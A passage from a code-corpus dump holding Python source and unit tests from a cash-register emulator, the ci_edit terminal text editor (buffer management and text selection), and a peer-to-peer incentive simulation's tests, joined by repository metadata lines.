for cr in dump[CASH_RECIEPT]]
return dict(zip(nums, sums))
```
#### File: mgnemu/models/check_comment.py
```python
from mgnemu.models.base_model import BaseModel
from mgnemu.models.sales_types import COMMENT_TYPE
from mgnemu.models.sales_types import COMMENT
class CheckComment(BaseModel):
def __init__(self, data):
BaseModel.__init__(self, COMMENT_TYPE)
if COMMENT in list(data.keys()):
self.__cm = data[COMMENT]
else:
self.__cm = ''
@property
def cm(self):
return self.__cm
def dumps(self):
return {
'id': BaseModel.check_id(),
self.model_type: {
COMMENT: self.__cm,
}
}
```
#### File: mgnemu/models/check.py
```python
from mgnemu.models.base_model import BaseModel
from mgnemu.models.model_fabric import ModelFabric
from mgnemu.models.sales_types import SALES_RECIEPT
from mgnemu.models.sales_types import RETURN_RECIEPT
from mgnemu.models.sales_types import PAYMENT
class Check(BaseModel):
def __init__(self, data):
keys = list(data.keys())
if SALES_RECIEPT in keys:
BaseModel.__init__(self, SALES_RECIEPT)
elif RETURN_RECIEPT in keys:
BaseModel.__init__(self, RETURN_RECIEPT)
else:
raise KeyError('Unknown check key error')
fabric = ModelFabric()
self.__data = [fabric.get_model(val)
for val in data[self.model_type]
if fabric.get_model(val) is not None]
def gen_check(self):
dumps = self.dumps()
sign = 1
check_sum = 0
keys = list(dumps.keys())
if SALES_RECIEPT in keys:
dump = dumps[SALES_RECIEPT]
elif RETURN_RECIEPT in keys:
dump = dumps[RETURN_RECIEPT]
sign = -1
else:
return {}
nums = [cr[PAYMENT]['no']
for cr in dump
if PAYMENT in list(cr.keys())]
sums = [sign * cr[PAYMENT]['sum']
for cr in dump
if PAYMENT in list(cr.keys())]
return dict(zip(nums, sums))
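    # Illustrative note (an assumption based on the code above): gen_check()
    # maps each payment number to its signed sum, e.g. a return receipt with a
    # single payment {'no': 1, 'sum': 25} would yield {1: -25}.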
@property
def check_type(self):
return self.model_type
def dumps(self):
return {
'id': BaseModel.check_id(),
self.model_type: [val.dumps() for val in self.__data]
}
```
#### File: mgnemu/models/model_fabric.py
```python
from mgnemu.models.discount import Discount
from mgnemu.models.payment_type import PaymentType
from mgnemu.models.check_line import CheckLine
from mgnemu.models.check_comment import CheckComment
from mgnemu.models.sales_types import DISCOUNT
from mgnemu.models.sales_types import CHECK_LINE
from mgnemu.models.sales_types import PAYMENT
from mgnemu.models.sales_types import COMMENT_TYPE
class ModelFabric(object):
def __init__(self):
pass
def get_model(self, data):
keys = list(data.keys())
if DISCOUNT in keys:
return Discount(data[DISCOUNT])
elif CHECK_LINE in keys:
return CheckLine(data[CHECK_LINE])
elif PAYMENT in keys:
return PaymentType(data[PAYMENT])
elif COMMENT_TYPE in keys:
return CheckComment(data[COMMENT_TYPE])
else:
return None
```
#### File: mgnemu/tests/test_cash_operation.py
```python
from mgnemu.models.cash_operation import CashOperation
from unittest import TestCase
class TestCashOperation(TestCase):
def setUp(self):
self.json_data = {
'IO': [
{
'IO': {
'sum': 30
}
}
]
}
def test_loads_json(self):
model = CashOperation(self.json_data)
data_line = model.dumps()
dataIO = data_line['IO']
print(dataIO)
data_list = dataIO[0]
data = data_list['IO']
assert(data['sum'] == 30)
```
#### File: mgnemu/tests/test_payment_type.py
```python
from mgnemu.models.payment_type import PaymentType
from unittest import TestCase
class TestPaymentType(TestCase):
def setUp(self):
self.json_data = {
"sum": 1,
"no": 2,
"rrn": "3",
"card": "4"
}
def test_loads_json(self):
model = PaymentType(self.json_data)
assert(model.sum == 1)
assert(model.no == 2)
assert(model.rrn == '3')
assert(model.card == '4')
data_line = model.dumps()
data = data_line['P']
assert(data['sum'] == 1)
assert(data['no'] == 2)
assert(data['rrn'] == '3')
assert(data['card'] == '4')
``` |
{
"source": "0xPrateek/ci_edit",
"score": 2
} |
#### File: ci_edit/app/buffer_manager.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
try:
unicode
except NameError:
unicode = str # redefined-builtin
unichr = chr
import io
import os
import sys
import app.buffer_file
import app.config
import app.log
import app.history
import app.text_buffer
class BufferManager:
"""Manage a set of text buffers. Some text buffers may be hidden."""
def __init__(self, program, prefs):
if app.config.strict_debug:
assert issubclass(self.__class__, BufferManager), self
self.program = program
self.prefs = prefs
# Using a dictionary lookup for buffers accelerates finding buffers by
# key (the file path), but that's not the common use. Maintaining an
# ordered list turns out to be more valuable.
self.buffers = []
    def closeTextBuffer(self, textBuffer):
        """Warning: this will throw away the buffer. Please be sure the user
        is OK with this before calling."""
if app.config.strict_debug:
assert issubclass(self.__class__, BufferManager), self
assert issubclass(textBuffer.__class__, app.text_buffer.TextBuffer)
self.untrackBuffer_(textBuffer)
def getUnsavedBuffer(self):
for fileBuffer in self.buffers:
if fileBuffer.isDirty():
return fileBuffer
return None
def newTextBuffer(self):
textBuffer = app.text_buffer.TextBuffer(self.program)
self.buffers.append(textBuffer)
app.log.info(textBuffer)
self.debugLog()
return textBuffer
def nextBuffer(self):
app.log.info()
self.debugLog()
if len(self.buffers):
return self.buffers[0]
return None
def topBuffer(self):
app.log.info()
self.debugLog()
if len(self.buffers):
return self.buffers[-1]
return None
def getValidTextBuffer(self, textBuffer):
"""If |textBuffer| is a managed buffer return it, otherwise create a new
buffer. Primarily used to determine if a held reference to a textBuffer
is still valid."""
if textBuffer in self.buffers:
del self.buffers[self.buffers.index(textBuffer)]
self.buffers.append(textBuffer)
return textBuffer
textBuffer = app.text_buffer.TextBuffer(self.program)
self.buffers.append(textBuffer)
return textBuffer
def loadTextBuffer(self, relPath):
if app.config.strict_debug:
assert issubclass(self.__class__, BufferManager), self
assert isinstance(relPath, unicode), type(relPath)
fullPath = app.buffer_file.expandFullPath(relPath)
app.log.info(fullPath)
textBuffer = None
for i, tb in enumerate(self.buffers):
if tb.fullPath == fullPath:
textBuffer = tb
del self.buffers[i]
self.buffers.append(tb)
break
app.log.info(u'Searched for textBuffer', repr(textBuffer))
if not textBuffer:
if os.path.isdir(fullPath):
app.log.info(u'Tried to open directory as a file', fullPath)
return
if not os.path.isfile(fullPath):
app.log.info(u'creating a new file at\n ', fullPath)
textBuffer = app.text_buffer.TextBuffer(self.program)
textBuffer.setFilePath(fullPath)
textBuffer.fileLoad()
self.buffers.append(textBuffer)
if 0:
self.debugLog()
return textBuffer
def debugLog(self):
bufferList = u''
for i in self.buffers:
bufferList += u'\n ' + repr(i.fullPath)
bufferList += u'\n ' + repr(i)
bufferList += u'\n dirty: ' + str(i.isDirty())
app.log.info(u'BufferManager' + bufferList)
def readStdin(self):
app.log.info(u'reading from stdin')
# Create a new input stream for the file data.
# Fd is short for file descriptor. os.dup and os.dup2 will duplicate
# file descriptors.
stdinFd = sys.stdin.fileno()
newFd = os.dup(stdinFd)
newStdin = io.open(u"/dev/tty")
os.dup2(newStdin.fileno(), stdinFd)
# Create a text buffer to read from alternate stream.
textBuffer = self.newTextBuffer()
try:
with io.open(newFd, u"r") as fileInput:
textBuffer.fileFilter(fileInput.read())
except Exception as e:
app.log.exception(e)
app.log.info(u'finished reading from stdin')
return textBuffer
def untrackBuffer_(self, fileBuffer):
app.log.debug(fileBuffer.fullPath)
self.buffers.remove(fileBuffer)
def fileClose(self, path):
pass
```
#### File: ci_edit/app/selectable.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import app.config
import app.line_buffer
import app.log
import app.regex
# No selection.
kSelectionNone = 0
# Entire document selected.
kSelectionAll = 1
# A rectangular block selection.
kSelectionBlock = 2
# Character by character selection.
kSelectionCharacter = 3
# Select whole lines.
kSelectionLine = 4
# Select whole words.
kSelectionWord = 5
# How many selection modes are there.
kSelectionModeCount = 6
kSelectionModeNames = [
'None',
'All',
'Block',
'Char',
'Line',
'Word',
]
class Selectable(app.line_buffer.LineBuffer):
def __init__(self, program):
app.line_buffer.LineBuffer.__init__(self, program)
# When a text document is not line wrapped then each row will represent
        # one line in the document, though rows are zero based and lines are one
# based. With line wrapping enabled there may be more rows than lines
# since a line may wrap into multiple rows.
self.penRow = 0
# When a text document contains only ascii characters then each char
# (character) will represent one column in the text line (col is zero
# based and the column displayed in the UI is one based). When double
        # wide characters are present then a line of text will have more columns
# than characters.
# (penChar is not currently used).
self.penChar = 0
        # When a text document contains only ascii characters then each
        # character will occupy one column in the text line (col is zero based
        # and the column displayed in the UI is one based).
self.penCol = 0
self.markerRow = 0
self.markerCol = 0
self.selectionMode = kSelectionNone
def countSelected(self):
lines = self.getSelectedText()
chars = len(lines) - 1 # Count carriage returns.
for line in lines:
chars += len(line)
return chars, len(lines)
def selection(self):
return (self.penRow, self.penCol, self.markerRow, self.markerCol)
def selectionModeName(self):
return kSelectionModeNames[self.selectionMode]
def getSelectedText(self):
upperRow, upperCol, lowerRow, lowerCol = self.startAndEnd()
return self.getText(upperRow, upperCol, lowerRow, lowerCol,
self.selectionMode)
def getText(self,
upperRow,
upperCol,
lowerRow,
lowerCol,
selectionMode=kSelectionCharacter):
if app.config.strict_debug:
assert isinstance(upperRow, int)
assert isinstance(upperCol, int)
assert isinstance(lowerRow, int)
assert isinstance(lowerCol, int)
assert isinstance(selectionMode, int)
assert upperRow <= lowerRow
assert upperRow != lowerRow or upperCol <= lowerCol
assert kSelectionNone <= selectionMode < kSelectionModeCount
lines = []
if selectionMode == kSelectionBlock:
if (lowerRow + 1 < self.parser.rowCount()):
lowerRow += 1
for i in range(upperRow, lowerRow):
lines.append(self.parser.rowText(i, upperCol, lowerCol))
elif (selectionMode == kSelectionAll or
selectionMode == kSelectionCharacter or
selectionMode == kSelectionLine or
selectionMode == kSelectionWord):
if upperRow == lowerRow:
lines.append(self.parser.rowText(upperRow, upperCol, lowerCol))
else:
for i in range(upperRow, lowerRow + 1):
if i == upperRow:
lines.append(self.parser.rowText(i, upperCol))
elif i == lowerRow:
lines.append(self.parser.rowText(i, 0, lowerCol))
else:
lines.append(self.parser.rowText(i))
return tuple(lines)
def doDeleteSelection(self):
"""Call doDelete() with current pen and marker values."""
upperRow, upperCol, lowerRow, lowerCol = self.startAndEnd()
self.doDelete(upperRow, upperCol, lowerRow, lowerCol)
def doDelete(self, upperRow, upperCol, lowerRow, lowerCol):
"""Delete characters from (upperRow, upperCol) up to (lowerRow,
lowerCol) using the current selection mode."""
if app.config.strict_debug:
assert isinstance(upperRow, int)
assert isinstance(upperCol, int)
assert isinstance(lowerRow, int)
assert isinstance(lowerCol, int)
assert upperRow <= lowerRow
assert upperRow != lowerRow or upperCol <= lowerCol
if self.selectionMode == kSelectionBlock:
self.parser.deleteBlock(upperRow, upperCol, lowerRow, lowerCol)
elif (self.selectionMode == kSelectionNone or
self.selectionMode == kSelectionAll or
self.selectionMode == kSelectionCharacter or
self.selectionMode == kSelectionLine or
self.selectionMode == kSelectionWord):
self.parser.deleteRange(upperRow, upperCol, lowerRow, lowerCol)
def insertLines(self, lines):
if app.config.strict_debug:
assert isinstance(lines, tuple)
self.insertLinesAt(self.penRow, self.penCol, lines, self.selectionMode)
def insertLinesAt(self, row, col, lines, selectionMode):
if app.config.strict_debug:
assert isinstance(row, int)
assert isinstance(col, int)
assert isinstance(lines, tuple)
assert isinstance(selectionMode, int)
if len(lines) <= 1:
if len(lines) == 0 or len(lines[0]) == 0:
# Optimization. There's nothing to insert.
return
lines = list(lines)
if selectionMode == kSelectionBlock:
self.parser.insertBlock(row, col, lines)
elif (selectionMode == kSelectionNone or
selectionMode == kSelectionAll or
selectionMode == kSelectionCharacter or
selectionMode == kSelectionLine or
selectionMode == kSelectionWord):
if len(lines) == 1:
self.parser.insert(row, col, lines[0])
else:
self.parser.insertLines(row, col, lines)
else:
app.log.info('selection mode not recognized', selectionMode)
    def __extendWords(self, upperRow, upperCol, lowerRow, lowerCol):
        """Extends an existing selection to the nearest word boundaries. The
pen and marker will be extended away from each other. The extension may
occur in one, both, or neither direction.
Returns: tuple of (upperCol, lowerCol).
"""
line = self.parser.rowText(upperRow)
for segment in re.finditer(app.regex.kReWordBoundary, line):
if segment.start() <= upperCol < segment.end():
upperCol = segment.start()
break
line = self.parser.rowText(lowerRow)
for segment in re.finditer(app.regex.kReWordBoundary, line):
if segment.start() < lowerCol < segment.end():
lowerCol = segment.end()
break
return upperCol, lowerCol
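    # Illustrative sketch (an assumption; the exact boundaries depend on
    # app.regex.kReWordBoundary): with row text u"one two" and both upperCol
    # and lowerCol at 5 (inside "two"), __extendWords() widens the pair to
    # (4, 7), i.e. the whole word "two".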
    def extendSelection(self):
        """Expand the current selection to fit the selection mode. E.g. if the
        pen is in the middle of a word, word selection will extend the
        selection to the left and right so that the whole word is selected.
Returns: tuple of (penRow, penCol, markerRow, markerCol, selectionMode)
which are the delta values to accomplish the selection mode.
"""
if self.selectionMode == kSelectionNone:
return (0, 0, -self.markerRow, -self.markerCol, 0)
elif self.selectionMode == kSelectionAll:
lowerRow = self.parser.rowCount() - 1
lowerCol = self.parser.rowWidth(-1)
return (lowerRow - self.penRow,
lowerCol - self.penCol, -self.markerRow,
-self.markerCol, 0)
elif self.selectionMode == kSelectionLine:
return (0, -self.penCol, 0, -self.markerCol, 0)
elif self.selectionMode == kSelectionWord:
if self.penRow > self.markerRow or (self.penRow == self.markerRow
and
self.penCol > self.markerCol):
upperCol, lowerCol = self.__extendWords(
self.markerRow, self.markerCol, self.penRow, self.penCol)
return (0, lowerCol - self.penCol, 0, upperCol - self.markerCol,
0)
else:
upperCol, lowerCol = self.__extendWords(
self.penRow, self.penCol, self.markerRow, self.markerCol)
return (0, upperCol - self.penCol, 0, lowerCol - self.markerCol,
0)
return (0, 0, 0, 0, 0)
def startAndEnd(self):
"""Get the marker and pen pair as the earlier of the two then the later
of the two. The result accounts for the current selection mode."""
upperRow = 0
upperCol = 0
lowerRow = 0
lowerCol = 0
if self.selectionMode == kSelectionNone:
upperRow = self.penRow
upperCol = self.penCol
lowerRow = self.penRow
lowerCol = self.penCol
elif self.selectionMode == kSelectionAll:
upperRow = 0
upperCol = 0
lowerRow = self.parser.rowCount() - 1
lowerCol = self.parser.rowWidth(-1)
elif self.selectionMode == kSelectionBlock:
upperRow = min(self.markerRow, self.penRow)
upperCol = min(self.markerCol, self.penCol)
lowerRow = max(self.markerRow, self.penRow)
lowerCol = max(self.markerCol, self.penCol)
elif (self.selectionMode == kSelectionCharacter or
self.selectionMode == kSelectionLine or
self.selectionMode == kSelectionWord):
upperRow = self.markerRow
upperCol = self.markerCol
lowerRow = self.penRow
lowerCol = self.penCol
if upperRow == lowerRow and upperCol > lowerCol:
upperCol, lowerCol = lowerCol, upperCol
elif upperRow > lowerRow:
upperRow, lowerRow = lowerRow, upperRow
upperCol, lowerCol = lowerCol, upperCol
#app.log.detail('start and end', upperRow, upperCol, lowerRow, lowerCol)
return (upperRow, upperCol, lowerRow, lowerCol)
```
#### File: ci_edit/app/unit_test_selectable.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import app.log
import app.ci_program
import app.selectable
class SelectableTestCases(unittest.TestCase):
def setUp(self):
self.selectable = app.selectable.Selectable(app.ci_program.CiProgram())
app.log.shouldWritePrintLog = True
def tearDown(self):
self.selectable = None
def test_default_values(self):
selectable = self.selectable
self.assertEqual(selectable.selection(), (0, 0, 0, 0))
def test_selection_none(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionNone
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
def test_selection_all(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionAll
self.assertEqual(selectable.extendSelection(), (2, 4, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (2, 1, 0, 0, 0))
def test_selection_block(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionBlock
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
def test_selection_character(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionCharacter
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
def test_selection_line(self):
selectable = self.selectable
selectable.parser.data = u"one two\n\nfive"
selectable.parseDocument()
selectable.penRow = 1
selectable.selectionMode = app.selectable.kSelectionLine
app.log.debug(u"selectable.extendSelection",
selectable.extendSelection())
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penRow = 3
selectable.penCol = 3
selectable.markerRow = 1
selectable.markerCol = 4
self.assertEqual(selectable.extendSelection(), (0, -3, 0, -4, 0))
def test_selection_word(self):
selectable = self.selectable
selectable.parser.data = u"one two\nSeveral test words\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionWord
selectable.penRow = 1
selectable.penCol = 2
self.assertEqual(selectable.extendSelection(), (0, 5, 0, 0, 0))
selectable.penRow = 1
selectable.penCol = 9
selectable.markerCol = 2
self.assertEqual(selectable.extendSelection(), (0, 3, 0, -2, 0))
# Deletion tests.
def test_deletion_none(self):
selectable = self.selectable
selectable.parser.data = u"one two\nSeveral test words.\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionNone
selectable.penCol = 1
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data,
u"one two\nSeveral test words.\nfive")
def test_deletion_all(self):
selectable = self.selectable
def applySelection(args):
selectable.penRow += args[0]
selectable.penCol += args[1]
selectable.markerRow += args[2]
selectable.markerCol += args[3]
selectable.selectionMode += args[4]
self.assertEqual(selectable.selection(), (0, 0, 0, 0))
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
self.assertEqual(selectable.selection(), (0, 0, 0, 0))
selectable.selectionMode = app.selectable.kSelectionAll
self.assertEqual(selectable.extendSelection(), (2, 4, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (2, 1, 0, 0, 0))
applySelection(selectable.extendSelection())
self.assertEqual(selectable.selection(), (2, 4, 0, 0))
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data, u"")
selectable.insertLinesAt(0, 0, (u"wx", u"", u"yz"),
app.selectable.kSelectionAll)
self.assertEqual(selectable.parser.data, u"wx\n\nyz")
def test_deletion_block(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionBlock
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.markerRow = 0
selectable.markerCol = 1
selectable.penRow = 2
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
self.assertEqual(selectable.parser.data, u"oneTwo\n\nfive")
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data, u"oTwo\n\nfe")
selectable.insertLinesAt(0, 1, (u"wx", u"", u"yz"),
app.selectable.kSelectionBlock)
self.assertEqual(selectable.parser.data, u"owxTwo\n\nfyze")
def test_deletion_character(self):
selectable = self.selectable
selectable.parser.data = u"one two\nSeveral test words.\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionCharacter
selectable.penCol = 1
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data,
u"ne two\nSeveral test words.\nfive")
selectable.markerCol = 3
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data,
u"ntwo\nSeveral test words.\nfive")
selectable.penRow = 1
selectable.penCol = 1
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data, u"ntweveral test words.\nfive")
def test_deletion_line(self):
selectable = self.selectable
selectable.parser.data = u"one two\n\nfive"
selectable.parseDocument()
selectable.penRow = 1
selectable.selectionMode = app.selectable.kSelectionLine
app.log.debug(u"selectable.extendSelection",
selectable.extendSelection())
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penRow = 3
selectable.penCol = 3
selectable.markerRow = 1
selectable.markerCol = 4
self.assertEqual(selectable.extendSelection(), (0, -3, 0, -4, 0))
def test_deletion_word(self):
selectable = self.selectable
selectable.parser.data = u"one two\nSeveral test words.\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionWord
selectable.penRow = 1
selectable.penCol = 2
self.assertEqual(selectable.extendSelection(), (0, 5, 0, 0, 0))
selectable.penRow = 1
selectable.penCol = 9
selectable.markerCol = 2
self.assertEqual(selectable.extendSelection(), (0, 3, 0, -2, 0))
if __name__ == "__main__":
unittest.main()
```
#### File: 0xPrateek/ci_edit/setup.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from setuptools import setup
from setuptools import find_packages
from datetime import datetime
import io
import os
here = os.path.abspath(os.path.dirname(__file__))
def get_long_description():
# Read the long-description from a file.
with io.open(os.path.join(here, 'readme.md'), encoding='utf-8') as f:
return '\n' + f.read()
setup(
name='ci_edit',
version=datetime.strftime(datetime.today(), "%Y%m%d"),
description='A terminal text editor with mouse support and ctrl+Q to quit.',
long_description=get_long_description(),
long_description_content_type='text/markdown',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
url='https://github.com/google/ci_edit',
classifiers=[
"Programming Language :: Python :: 3",
"Environment :: Console",
"Environment :: Console :: Curses",
"License :: OSI Approved :: Apache Software License",
"Topic :: Text Editors",
],
packages=find_packages(),
scripts=['ci.py'],
license='Apache 2.0',
)
``` |
{
"source": "0xProject/p2p_incentives",
"score": 3
} |
#### File: test/data_processing/test_calculate_density.py
```python
from typing import List, Tuple
import pytest
from data_processing import calculate_density
from data_types import InvalidInputError
from .__init__ import SATISFACTORY_LIST
# test normal cases
CASES_CALCULATE_DENSITY: List[Tuple[List[List[float]], float, List[float]]] = [
# satisfactory_list, division_unit, result
(
[
SATISFACTORY_LIST[0],
SATISFACTORY_LIST[1],
SATISFACTORY_LIST[2],
SATISFACTORY_LIST[3],
],
0.1,
[0.1, 0.1, 0.2, 0, 0.1, 0, 0.1, 0, 0.2, 0.1, 0.1],
),
([SATISFACTORY_LIST[0], SATISFACTORY_LIST[1]], 0.5, [4 / 9, 4 / 9, 1 / 9]),
]
@pytest.mark.parametrize(
"satisfactory_list, division_unit, expected_output", CASES_CALCULATE_DENSITY
)
def test_calculate_density__normal(
satisfactory_list: List[List[float]],
division_unit: float,
expected_output: List[float],
) -> None:
"""
This function tests calculate_density() with normal inputs.
:param satisfactory_list: first input in calculate_density()
:param division_unit: second input in calculate_density()
:param expected_output: expected output.
:return: None
"""
actual_output: List[float] = calculate_density(satisfactory_list, division_unit)
assert actual_output == pytest.approx(expected_output)
# test exceptions
def test_calculate_density__no_input() -> None:
"""
This function tests calculate_density() with empty input.
:return: None
"""
with pytest.raises(InvalidInputError):
calculate_density([], 0.1)
def test_calculate_density__no_value() -> None:
"""
This function tests calculate_density() with non-empty input, but every list in the input is
empty.
:return: None
"""
with pytest.raises(ValueError, match="There is no data in any input lists."):
calculate_density([[], []], 0.1)
def test_calculate_density__out_of_range() -> None:
"""
This function tests calculate_density() with number out of range.
:return: None
"""
with pytest.raises(ValueError, match="Some input data is out of range."):
calculate_density([SATISFACTORY_LIST[4]], 0.1)
def test_calculate_density__invalid_division_unit() -> None:
"""
This function tests calculate_density() with invalid division unit.
:return: None
"""
with pytest.raises(ValueError, match="Invalid division unit."):
calculate_density([SATISFACTORY_LIST[0]], 2)
```
#### File: test/data_processing/test_find_best_worst_lists.py
```python
from typing import List, Tuple
import pytest
from data_processing import find_best_worst_lists
from data_types import BestAndWorstLists, InvalidInputError, SpreadingRatio
from .__init__ import RATIO_LIST
# test normal cases
CASES_BEST_WORST_LISTS: List[Tuple[List[SpreadingRatio], BestAndWorstLists]] = [
# tuples: (input, output)
(
[RATIO_LIST[0], RATIO_LIST[1], RATIO_LIST[2]],
BestAndWorstLists(best=RATIO_LIST[2], worst=RATIO_LIST[0]),
),
(
[RATIO_LIST[0], RATIO_LIST[1], RATIO_LIST[2], RATIO_LIST[3]],
BestAndWorstLists(best=RATIO_LIST[2], worst=RATIO_LIST[0]),
),
(
[RATIO_LIST[3], RATIO_LIST[4], RATIO_LIST[5]],
BestAndWorstLists(best=RATIO_LIST[4], worst=RATIO_LIST[4]),
),
(
[RATIO_LIST[4], RATIO_LIST[5], RATIO_LIST[6]],
BestAndWorstLists(best=RATIO_LIST[6], worst=RATIO_LIST[4]),
),
(
[RATIO_LIST[5], RATIO_LIST[7], RATIO_LIST[8]],
BestAndWorstLists(best=RATIO_LIST[5], worst=RATIO_LIST[8]),
),
(
[RATIO_LIST[3], RATIO_LIST[9], RATIO_LIST[10], RATIO_LIST[11]],
BestAndWorstLists(best=RATIO_LIST[10], worst=RATIO_LIST[11]),
),
(
[
RATIO_LIST[0],
RATIO_LIST[1],
RATIO_LIST[2],
RATIO_LIST[3],
RATIO_LIST[4],
RATIO_LIST[5],
RATIO_LIST[6],
RATIO_LIST[7],
RATIO_LIST[8],
RATIO_LIST[9],
RATIO_LIST[10],
],
BestAndWorstLists(best=RATIO_LIST[6], worst=RATIO_LIST[0]),
),
]
@pytest.mark.parametrize("ratio_list, expected_output", CASES_BEST_WORST_LISTS)
def test_find_best_worst_lists__normal(
ratio_list: List[SpreadingRatio], expected_output: BestAndWorstLists
) -> None:
"""
This function tests find_best_worst_lists in normal cases
:param ratio_list: list of SpreadingRatio instances
:param expected_output: an instance of BestAndWorstLists
:return: None
"""
actual_output: BestAndWorstLists = find_best_worst_lists(ratio_list)
for idx in range(2):
assert len(expected_output[idx]) == len(actual_output[idx])
        for value_idx in range(len(expected_output[idx])):
if isinstance(expected_output[idx][value_idx], float):
assert actual_output[idx][value_idx] == pytest.approx(
expected_output[idx][value_idx]
)
else: # this is a None
assert expected_output[idx][value_idx] is actual_output[idx][value_idx]
# test exceptions
def test_find_best_worst_lists__all_none() -> None:
"""
This function tests find_best_worst_lists when every element is None.
:return: None
"""
with pytest.raises(ValueError, match="All entries are None."):
find_best_worst_lists([RATIO_LIST[3], RATIO_LIST[12], RATIO_LIST[13]])
def test_find_best_worst_lists__empty_input() -> None:
"""
This function tests find_best_worst_lists when the input is empty.
:return: None
"""
with pytest.raises(InvalidInputError):
find_best_worst_lists([])
def test_find_best_worst_lists__different_length() -> None:
"""
This function tests find_best_worst_lists when the input length varies.
:return: None
"""
with pytest.raises(ValueError, match="Input lists are of different length."):
find_best_worst_lists([RATIO_LIST[0], RATIO_LIST[1], RATIO_LIST[14]])
```
#### File: test/engine/test_tit_for_tat.py
```python
import random
from typing import NamedTuple, Tuple, List
import pytest
import engine_candidates
from scenario import Scenario
from engine import Engine
from node import Peer
from ..__init__ import (
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_test_peers,
create_a_test_peer,
)
def mock_random_sample(peers: List[Peer], number: int) -> List[Peer]:
"""
This is a mock function for random.sample(). In this module it is particularly used to select
some peer from a list of peers. In order to make it deterministic, in this mock
function we always return a list of peers with the smallest sequence numbers, and that the
size of the list equals "number".
"""
if number > len(peers):
raise ValueError("Not enough peers to choose from.")
list_of_peers = list(peers)
list_of_peers.sort(key=lambda x: x.seq)
return list_of_peers[:number]
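# Illustrative example (not part of the original tests): given peers whose seq
# values are 9, 2 and 5, mock_random_sample(peers, 2) returns the peers with
# seq 2 and 5, in that order.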
class CaseType(NamedTuple):
"""
This is a date type defined for the test cases in this module.
The first six attributes are inputs to the test function, and the last two are expected outputs.
"""
scenario: Scenario # a scenario instance to create peers/orders
engine: Engine # an engine instance to create peers/orders
num_neighbors: int # number of neighbors that a peer has
mutual: int # mutual in tit-for-tat
optimistic: int # optimistic in tit-for-tat
time_now: int # time now
# expected number of neighbors selected as beneficiaries, by tit-for-tat
expected_length: int
# tuple containing sequence numbers of neighbor selected
expected_seqs: Tuple[int, ...]
# Case 1 represents that a peer is still a baby (age < baby_ending, in all tests we fix
# baby_ending = 10 and peer.birth_time = 0) so it will randomly choose (mutual + optimistic)
# neighbors from the set.
# Since we mocked the random.sample() function it will always choose the ones with the smallest
# sequence numbers.
CASE_1 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_neighbors=10,
mutual=3,
optimistic=1,
time_now=0,
expected_length=4,
expected_seqs=(0, 1, 2, 3),
)
# In all following cases, peers are not babies any more (time_now = 100).
# In case 2, the total number of neighbors is so small (< mutual) that all neighbors will be selected.
CASE_2 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_neighbors=3,
mutual=8,
optimistic=1,
time_now=100,
expected_length=3,
expected_seqs=(0, 1, 2),
)
# In case 3, the total number of neighbors is still small (> mutual but < mutual + optimistic),
# so all neighbors will be selected.
CASE_3 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_neighbors=5,
mutual=3,
optimistic=5,
time_now=100,
expected_length=5,
expected_seqs=(0, 1, 2, 3, 4),
)
# Case 4 is a typical one. The total number of neighbors is large, so "mutual" number of highly
# scored peers will be selected (in this case, they are peers 497-499) and "optimistic" number of
# the rest will be randomly selected (in this case, they are peers 0-4).
CASE_4 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_neighbors=500,
mutual=3,
optimistic=5,
time_now=100,
expected_length=8,
expected_seqs=(497, 498, 499, 0, 1, 2, 3, 4),
)
@pytest.mark.parametrize(
"scenario, engine, num_neighbors, mutual, optimistic, time_now, expected_length, expected_seqs",
[CASE_1, CASE_2, CASE_3, CASE_4],
)
def test_tit_for_tat__no_zero_contributors(
scenario: Scenario,
engine: Engine,
num_neighbors: int,
